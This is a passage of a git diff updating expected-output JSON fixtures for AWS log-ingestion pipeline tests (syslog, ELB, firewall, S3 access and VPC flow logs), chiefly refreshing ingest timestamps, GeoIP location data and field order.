"2021-12-14T14:35:29.134746939Z", "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms." }, "aws": { @@ -53,7 +53,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684183300Z", + "ingested": "2021-12-14T14:35:29.134747436Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)" }, "aws": { @@ -75,7 +75,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684188400Z", + "ingested": "2021-12-14T14:35:29.134747825Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)" }, "aws": { @@ -97,7 +97,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684193500Z", + "ingested": "2021-12-14T14:35:29.134748227Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds." }, "aws": { @@ -119,7 +119,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684198500Z", + "ingested": "2021-12-14T14:35:29.134748596Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s" }, "aws": { diff --git a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json index baf96cc0f76..e6fae20880b 100644 --- a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json +++ b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json @@ -43,7 +43,7 @@ } }, "event": { - "ingested": "2021-12-09T16:11:58.868846100Z", + "ingested": "2021-12-14T14:35:29.298563618Z", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", "kind": "event", "start": "2018-07-02T22:22:48.364000Z", diff --git a/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json b/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json index cb936390d85..20d23b35576 100644 --- a/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json +++ b/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json @@ -4,21 +4,18 @@ "destination": { "geo": { "continent_name": "North America", - "region_iso_code": "US-ID", - "city_name": "Salmon", + "region_iso_code": "US-WA", + "city_name": "Milton", "country_iso_code": "US", "country_name": "United States", - "region_name": "Idaho", + "region_name": "Washington", "location": { - "lon": -113.8784, - "lat": 45.1571 + "lon": -122.3149, + "lat": 47.2513 } }, "as": { - "number": 209, - "organization": { - "name": "CenturyLink Communications, LLC" - } + "number": 209 }, "address": "216.160.83.57", "port": 80, @@ -32,20 +29,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -128,14 +119,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -151,21 +142,18 @@ "source": { "geo": { "continent_name": "North America", - "region_iso_code": "US-ID", - "city_name": "Salmon", + "region_iso_code": "US-WA", + "city_name": "Milton", "country_iso_code": "US", "country_name": "United States", - "region_name": "Idaho", + "region_name": "Washington", "location": { - "lon": -113.8784, - "lat": 45.1571 + "lon": -122.3149, + "lat": 47.2513 } }, "as": { - "number": 209, - "organization": { - "name": "CenturyLink Communications, LLC" - } + "number": 209 }, "address": "216.160.83.61", "port": 61953, diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json index abd3a9e4751..87871764470 100644 --- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json +++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json @@ -11,14 +11,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": { @@ -61,7 +61,7 @@ }, "event": { "duration": 17000000, - "ingested": "2021-12-09T16:11:59.134194800Z", + "ingested": "2021-12-14T14:35:30.078202808Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", @@ -118,14 +118,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": { @@ -168,7 +168,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-12-09T16:11:59.134198700Z", + "ingested": "2021-12-14T14:35:30.078205536Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", @@ -225,14 +225,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": { @@ -275,7 +275,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T16:11:59.134204100Z", + "ingested": "2021-12-14T14:35:30.078206039Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.BUCKET", @@ -333,14 +333,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": { @@ -383,7 +383,7 @@ }, "event": { "duration": 4000000, - "ingested": "2021-12-09T16:11:59.134208400Z", + "ingested": "2021-12-14T14:35:30.078206436Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", @@ -430,19 +430,16 @@ } }, { - "tags": [ - "preserve_original_event" - ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": { @@ -477,7 +474,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T16:11:59.134212900Z", + "ingested": "2021-12-14T14:35:30.078206822Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT", @@ -506,22 +503,22 @@ "key": "jolokia-war-1.5.0.war", "object_size": 344017 } - } - }, - { + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": { @@ -556,7 +553,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T16:11:59.134217300Z", + "ingested": "2021-12-14T14:35:30.078207213Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT", @@ -585,17 +582,12 @@ "key": "Screen+Shot+2019-09-09+at+9.08.44+AM.png", "object_size": 57138 } - } - }, - { - "url": { - "path": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz", - "extension": "gz", - "original": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "provider": "aws" }, @@ -628,7 +620,7 @@ }, "event": { "duration": 103000000, - "ingested": "2021-12-09T16:11:59.134221Z", + "ingested": "2021-12-14T14:35:30.078207621Z", "original": "67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz \"PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1\" 200 - - 773 103 13 \"-\" \"-\" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 -", "kind": "event", "action": "REST.PUT.OBJECT", @@ -659,7 +651,15 @@ "key": "AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz", "object_size": 773 } - } + }, + "url": { + "path": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz", + "extension": "gz", + "original": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json index 77a00b72a08..31c17d40da9 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json @@ -1,21 +1,31 @@ { "expected": [ { + "cloud": { + "provider": "aws", + "account": { + "id": "123456789010" + } + }, + "@timestamp": "2016-10-31T11:37:00.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, @@ -24,54 +34,21 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 34892, "bytes": 8855, - "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "packets": 54 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:3piNHoW0DjbrWkF//BeRomCaOZQ=", - "transport": "tcp", - "type": "ipv6", - "bytes": 8855, - "iana_number": "6", - "packets": 54 - }, - "cloud": { - "provider": "aws", - "account": { - "id": "123456789010" - } - }, - "@timestamp": "2016-10-31T11:37:00.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" - ] + "packets": 54, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-12-09T16:12:00.503382700Z", + "ingested": "2021-12-14T14:35:31.371624408Z", "original": "2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", "kind": "event", "start": "2016-10-31T11:35:08.000Z", @@ -88,6 +65,17 @@ "interface_id": "eni-1235b8ca123456789", "version": "2" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:3piNHoW0DjbrWkF//BeRomCaOZQ=", + "transport": "tcp", + "type": "ipv6", + "bytes": 8855, + "iana_number": "6", + "packets": 54 } }, { @@ -102,7 +90,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:00.503391600Z", + "ingested": "2021-12-14T14:35:31.371626576Z", "original": "2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z", @@ -134,7 +122,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:12:00.503397800Z", + "ingested": "2021-12-14T14:35:31.371627024Z", "original": "2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z", @@ -155,17 +143,33 @@ ] }, { + "cloud": { + "provider": "aws", + "account": { + "id": "123456789010" + } + }, + "@timestamp": "2014-12-14T04:07:50.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -181,14 +185,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -203,6 +207,25 @@ "ip": "89.160.20.156", "packets": 20 }, + "event": { + "ingested": "2021-12-14T14:35:31.371627385Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", + "kind": "event", + "start": "2014-12-14T04:06:50.000Z", + "end": "2014-12-14T04:07:50.000Z", + "type": "flow", + "category": "network_traffic", + "outcome": "allow" + }, + "aws": { + "vpcflow": { + "action": "ACCEPT", + "account_id": "123456789010", + "log_status": "OK", + "interface_id": "eni-1235b8ca123456789", + "version": "2" + } + }, "tags": [ "preserve_original_event" ], @@ -213,7 +236,9 @@ "bytes": 4249, "iana_number": "6", "packets": 20 - }, + } + }, + { "cloud": { "provider": "aws", "account": { @@ -230,38 +255,17 @@ "89.160.20.156" ] }, - "event": { - "ingested": "2021-12-09T16:12:00.503403700Z", - "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", - "kind": "event", - "start": "2014-12-14T04:06:50.000Z", - "end": "2014-12-14T04:07:50.000Z", - "type": "flow", - "category": "network_traffic", - "outcome": "allow" - }, - "aws": { - "vpcflow": { - "action": "ACCEPT", - "account_id": "123456789010", - "log_status": "OK", - "interface_id": "eni-1235b8ca123456789", - "version": "2" - } - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -277,14 +281,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -299,6 +303,25 @@ "ip": "89.160.20.156", "packets": 20 }, + "event": { + "ingested": "2021-12-14T14:35:31.371627745Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", + "kind": "event", + "start": "2014-12-14T04:06:50.000Z", + "end": "2014-12-14T04:07:50.000Z", + "type": "flow", + "category": "network_traffic", + "outcome": "deny" + }, + "aws": { + "vpcflow": { + "action": "REJECT", + "account_id": "123456789010", + "log_status": "OK", + "interface_id": "eni-1235b8ca123456789", + "version": "2" + } + }, "tags": [ "preserve_original_event" ], @@ -309,44 +332,25 @@ "bytes": 4249, "iana_number": "6", "packets": 20 - }, + } + }, + { "cloud": { "provider": "aws", "account": { "id": "123456789010" } }, - "@timestamp": "2014-12-14T04:07:50.000Z", + "@timestamp": "2015-05-29T16:32:22.000Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ "89.160.20.156", - "89.160.20.156" + "172.31.16.139" ] }, - "event": { - "ingested": "2021-12-09T16:12:00.503409900Z", - "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", - "kind": "event", - "start": "2014-12-14T04:06:50.000Z", - "end": "2014-12-14T04:07:50.000Z", - "type": "flow", - "category": "network_traffic", - "outcome": "deny" - }, - "aws": { - "vpcflow": { - "action": "REJECT", - "account_id": "123456789010", - "log_status": "OK", - "interface_id": "eni-1235b8ca123456789", - "version": "2" - } - } - }, - { "destination": { "port": 0, "address": "172.31.16.139", @@ -355,14 +359,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -377,6 +381,25 @@ "ip": "89.160.20.156", "packets": 4 }, + "event": { + "ingested": "2021-12-14T14:35:31.371628115Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", + "kind": "event", + "start": "2015-05-29T16:30:27.000Z", + "end": "2015-05-29T16:32:22.000Z", + "type": "flow", + "category": "network_traffic", + "outcome": "allow" + }, + "aws": { + "vpcflow": { + "action": "ACCEPT", + "account_id": "123456789010", + "log_status": "OK", + "interface_id": "eni-1235b8ca123456789", + "version": "2" + } + }, "tags": [ "preserve_original_event" ], @@ -386,7 +409,9 @@ "bytes": 336, "iana_number": "1", "packets": 4 - }, + } + }, + { "cloud": { "provider": "aws", "account": { @@ -399,42 +424,21 @@ }, "related": { "ip": [ - "89.160.20.156", - "172.31.16.139" + "172.31.16.139", + "89.160.20.156" ] }, - "event": { - "ingested": "2021-12-09T16:12:00.503416200Z", - "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", - "kind": "event", - "start": "2015-05-29T16:30:27.000Z", - "end": "2015-05-29T16:32:22.000Z", - "type": "flow", - "category": "network_traffic", - "outcome": "allow" - }, - "aws": { - "vpcflow": { - "action": "ACCEPT", - "account_id": "123456789010", - "log_status": "OK", - "interface_id": "eni-1235b8ca123456789", - "version": "2" - } - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -454,34 +458,8 @@ "packets": 4, "ip": "172.31.16.139" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:XiVZKra6oEtIAPBi9QgeQL4Hp6M=", - "type": "ipv4", - "bytes": 336, - "iana_number": "1", - "packets": 4 - }, - "cloud": { - "provider": "aws", - "account": { - "id": "123456789010" - } - }, - "@timestamp": "2015-05-29T16:32:22.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "172.31.16.139", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T16:12:00.503420100Z", + "ingested": "2021-12-14T14:35:31.371628494Z", "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK", "kind": "event", "start": "2015-05-29T16:31:34.000Z", @@ -498,6 +476,16 @@ "interface_id": "eni-1235b8ca123456789", "version": "2" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:XiVZKra6oEtIAPBi9QgeQL4Hp6M=", + "type": "ipv4", + "bytes": 336, + "iana_number": "1", + "packets": 4 } } ] diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json index cca3b2323c2..6be7b934be8 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json @@ -1,6 +1,25 @@ { "expected": [ { + "cloud": { + "provider": "aws", + "account": { + "id": "123456789010" + }, + "instance": { + "id": "i-01234567890123456" + } + }, + "@timestamp": "2019-08-26T19:48:53.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156", + "10.0.0.62" + ] + }, "destination": { "port": 5001, "address": "10.0.0.62", @@ -9,14 +28,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": 